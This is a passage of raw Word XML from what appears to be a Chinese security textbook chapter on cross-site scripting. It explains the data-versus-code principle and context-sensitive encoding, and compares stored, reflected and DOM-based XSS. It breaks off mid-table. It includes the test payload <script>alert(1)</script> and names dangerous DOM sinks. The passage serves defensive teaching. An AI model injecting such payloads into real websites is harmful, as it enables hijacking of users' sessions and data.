      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞的根源与第九章所述的注入类漏洞同源——数据与代码的边界被混淆，读者应先理解注入的基本思想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机与攻击面：攻击者视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御者视角</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者盯上跨站脚本（Cross‑Site</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripting，XSS）漏洞的根本意图，是借由受害者的浏览器在目标网站的“合法”会话上下文中执行任意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript。从防御者角度看，这意味着任何允许用户输入被嵌入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面的功能点——搜索框、评论区、个人资料字段、URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数等——都成为了可能的攻击面。一旦攻击者脚本得以执行，它能够读取该页面所属域的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、localStorage，篡改页面内容，发起伪造请求，甚至将其作为浏览器代理进一步探测内网。这不再是简单的“弹窗恶作剧”，而是对用户身份和数据的严重威胁。因此，理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的形成机制并在代码层面彻底消除，是客户端防御的首要任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：数据与代码的再次混淆</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心违反的假设与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入完全一致：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">用户提供的数据应当只被当作数据，而非可执行的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。当</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用将用户输入直接嵌入到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文档、CSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">样式或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码片段中，却没有进行与上下文适配的编码或转义时，攻击者就可以插入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签或脚本代码，从而打破数据的“纯粹性”，将其转化为浏览器解析器眼中的“指令”。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">举一个最简单的例子：一个搜索功能将用户输入的搜索词直接插入到结果页面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“您搜索的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ”+ $query + “ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的结果如下：”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。若攻击者输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，最终页面中就出现了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">元素，浏览器将执行该脚本。这只是冰山一角。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">上下文敏感性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：同一个输入在不同位置需要不同的编码规则。如在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">元素内容中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应转义为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；而在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串中，则需要对引号、反斜杠等进行转义；在事件处理器属性中，还需要同时考虑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码的嵌套顺序。若编码与实际上下文不匹配，漏洞依然存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1104"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与注入的同源性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属于注入攻击的子类，均源于输入校验或输出编码的缺失。这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中将注入归为一类，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为其重要成员的原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">三型对比：存储型、反射型与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传统上，XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根据攻击载荷的“旅行路径”划分为三种类型，理解其差异对于寻找漏洞和设计防御均至关重要。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">存储型（Stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者提交的恶意脚本被服务器永久保存（如存入数据库、日志文件、论坛帖子），当其他用户访问包含该数据的页面时，脚本从服务器随正常内容下发并在受害者浏览器中执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">假设被违反</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：存储在数据库中的“数据”应该只是无行为的文本，但应用在输出时未进行编码，将其直接注入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">威胁模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：一次写入，多次攻击。任何访问受影响页面的用户都可能中招，典型场景包括论坛签名、评论、用户个人简介等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">反射型（Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：恶意脚本并未存储在服务器端，而是“反射”回去：攻击者构造一个含有恶意脚本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">URL，诱使受害者点击，服务器在响应中直接回显了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数中的脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">假设被违反</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询参数仅承载数据，服务器不应将其原样回显至页面而不做转义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">威胁模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：需要社交工程配合，攻击者通过电子邮件、即时消息等方式发送链接。虽然是一次性的，但结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缩短服务可以使其看起来无害。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">型（DOM‑based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">XSS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：与前两者不同，DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的全过程发生在客户端。Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码从可控源（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.location</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">window.name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">postMessage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）读取数据，并传递给一个可执行的“汇”（sink，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），在此过程中数据未经安全处理，而服务器响应本身并没有包含恶意脚本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">假设被违反</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：客户端</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在处理来自不可信信源的数据时，缺乏与输出上下文匹配的净化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">独特性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">很难通过仅检查服务器响应来发现，必须审视客户端脚本的执行流程。现代前端框架（React、Vue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）提供了一定程度的自动转义，但若使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等危险</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或原生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操纵，风险依然存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10‑1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">归纳了三类</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的关键差异。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="880"/>
        <w:gridCol w:w="2346"/>
        <w:gridCol w:w="3226"/>
        <w:gridCol w:w="1466"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">恶意脚本存放处</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">触发时数据流经服务器？</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">典型示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">存储型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">是（服务器发送含</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的页面）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
